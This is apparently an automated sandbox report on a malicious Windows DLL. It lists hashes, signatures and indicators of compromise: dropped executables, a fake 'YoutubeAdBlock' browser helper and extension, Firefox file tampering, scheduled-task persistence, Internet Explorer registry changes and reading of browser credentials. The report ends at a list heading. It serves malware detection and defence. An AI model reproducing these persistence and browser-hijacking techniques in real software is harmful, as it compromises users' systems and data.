Analysis
-
max time kernel
146s -
max time network
110s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-11-2020 18:18
Static task
static1
Behavioral task
behavioral1
Sample
1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll
Resource
win7v20201028
Behavioral task
behavioral2
Sample
1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll
Resource
win10v20201028
General
-
Target
1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll
-
Size
304KB
-
MD5
f1e0baa123916ce237caee78536c75be
-
SHA1
3a24715b0a790836eb0323e0b2ee4663f8f759c2
-
SHA256
1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26
-
SHA512
721e0d3c53ba72cf9bb9470f5bad195c4d22503470ab0cf9a1019099bdc30a90451b01f2efc7e660eec0bd3114c20d44621e2ecb3148b6b5eda2c1dd14e2e849
Malware Config
Signatures
-
Registers COM server for autorun 1 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 9 908 rundll32.exe -
Executes dropped EXE 2 IoCs
Processes:
zvaxoElgmdJsrYMK.exezbeqEEi.exepid process 3240 zvaxoElgmdJsrYMK.exe 192 zbeqEEi.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Drops file in System32 directory 2 IoCs
Processes:
zvaxoElgmdJsrYMK.exedescription ioc process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol zvaxoElgmdJsrYMK.exe File created C:\Windows\system32\GroupPolicy\gpt.ini zvaxoElgmdJsrYMK.exe -
Drops file in Program Files directory 64 IoCs
Processes:
zvaxoElgmdJsrYMK.exedescription ioc process File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\zh_TW\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\background.html zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\am\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\da\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\el\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\tr\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\uk\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\oJCzsrkBUUUn\xIzJQFh.dll zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\be\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\fa\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ro\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\te\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\HJbvTEnmUxKU2\XlimpiE.xml zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\CzYifeKYfmykC\wHUFExf.xml zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\icon16.ico zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\en_GB\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\et\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\he\messages.json zvaxoElgmdJsrYMK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\bg\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\hi\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\lv\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\sk\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\vi\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ca\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\it\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ja\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\lt\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ms\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\pl\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\zh_CN\messages.json zvaxoElgmdJsrYMK.exe File opened for modification C:\Program Files (x86)\IjkjItfMxIE\files\Kernel.js zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\BsZkTgYBU\fUOLXK.dll zvaxoElgmdJsrYMK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{C69D6EEC-48CB-4724-9862-A3D0D68F7B5F}.xpi zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\Kernel.js zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\k2nAURG.dll zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\hu\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ml\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\BsZkTgYBU\OfrtJwm.xml zvaxoElgmdJsrYMK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\id\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\nl\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\sv\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\no\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\pt\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\sl\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\sq\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\en_US\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\es\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\fi\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\kn\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\mk\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\pt_BR\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\es_419\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\t4essNVn.dll zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\CzYifeKYfmykC\Oievkbi.dll zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\HJbvTEnmUxKU2\TfvUmOQLVXBKY.dll zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\reqCPqL.xml zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\bn\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\cs\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\de\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\en\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ko\messages.json zvaxoElgmdJsrYMK.exe File created C:\Program Files (x86)\IjkjItfMxIE\files\_locales\th\messages.json zvaxoElgmdJsrYMK.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\skPkswxjkHVnnFn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1992 schtasks.exe 888 schtasks.exe 2756 schtasks.exe 3928 schtasks.exe 3900 schtasks.exe 3704 schtasks.exe 912 schtasks.exe 2884 schtasks.exe -
Processes:
zvaxoElgmdJsrYMK.exezbeqEEi.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F} zvaxoElgmdJsrYMK.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy zvaxoElgmdJsrYMK.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Approved Extensions zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\AppPath = "C:\\Program Files (x86)\\IjkjItfMxIE" zvaxoElgmdJsrYMK.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\Policy = "3" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\AppPath = "C:\\Program Files (x86)\\IjkjItfMxIE" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" zbeqEEi.exe Key deleted \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\RECOVERY\ADMINACTIVE zvaxoElgmdJsrYMK.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\IBgzVFC.exe = "9999" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\AppName = "IBgzVFC.exe" zvaxoElgmdJsrYMK.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{33594515-D1AE-4483-BD6B-76A43DEACD5D} = 51667a6c4c1d3b1b055a42229c81ea0aa36532e43ea98844 zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\AppName = "IBgzVFC.exe" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Low Rights zvaxoElgmdJsrYMK.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch zbeqEEi.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F} zvaxoElgmdJsrYMK.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\Policy = "3" zvaxoElgmdJsrYMK.exe -
Modifies registry class 64 IoCs
Processes:
zvaxoElgmdJsrYMK.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\InprocServer32 zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\FLAGS\ = "0" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\InprocServer32\ThreadingModel = "Apartment" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ProxyStubClsid32 zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C} zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\TypeLib\ = "{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\TypeLib\Version = "1.0" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\ = "YoutubeAdBlock" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\Programmable zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\HELPDIR zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\ProxyStubClsid32 zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ = "IFjLfTJwTRzHZfBZPSWM" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9} zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\0 zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640} zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\0\win32\ = "C:\\Program Files (x86)\\IjkjItfMxIE\\IBgzVFC.exe" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\TypeLib\ = "{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\Programmable zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\Programmable\ zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0 zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\0\win32\ = "C:\\Program Files (x86)\\IjkjItfMxIE\\k2nAURG.dll" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\TypeLib\Version = "1.0" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\0\win32\ = "C:\\Program Files (x86)\\IjkjItfMxIE\\t4essNVn.dll" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\ = "YIvvzzTKDaMyEgZuUXW-)[<[NGdD[yXaHeSz" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\ProxyStubClsid32 zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9} zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\TypeLib zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\ProgID = "Toolbar.ExtensionHelperObject.1" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\ProxyStubClsid zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\0 zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\TypeLib\ = "{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\TypeLib\Version = "1.0" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ = "IFjLfTJwTRzHZfBZPSWM" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D} zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\FLAGS zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\InprocServer32 zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\0\win32 zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D} zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\ = "{9C48BD11-7852-4EC3-BD58-3E16A1332719}" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\LocalServer32\ = "C:\\Program Files (x86)\\IjkjItfMxIE\\IBgzVFC.exe" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\TypeLib zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\ zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\TypeLib\ = "{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\LocalServer32 zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\FLAGS zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\FLAGS\ = "0" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\ = "_rXsfhwEGaZDTbwKYYLRIJzyfqr" zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719} zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\Programmable zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\Programmable\ zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\ProxyStubClsid32 zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\ = "BackgroundScriptEngine Class" zvaxoElgmdJsrYMK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\Programmable\ zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8} zvaxoElgmdJsrYMK.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\TypeLib zvaxoElgmdJsrYMK.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.exezvaxoElgmdJsrYMK.exepid process 1008 powershell.exe 1008 powershell.exe 1008 powershell.exe 580 powershell.exe 580 powershell.exe 580 powershell.exe 744 powershell.EXE 744 powershell.EXE 744 powershell.EXE 3328 powershell.exe 3328 powershell.exe 3328 powershell.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe 3240 zvaxoElgmdJsrYMK.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.exedescription pid process Token: SeDebugPrivilege 1008 powershell.exe Token: SeDebugPrivilege 580 powershell.exe Token: SeDebugPrivilege 744 powershell.EXE Token: SeDebugPrivilege 3328 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
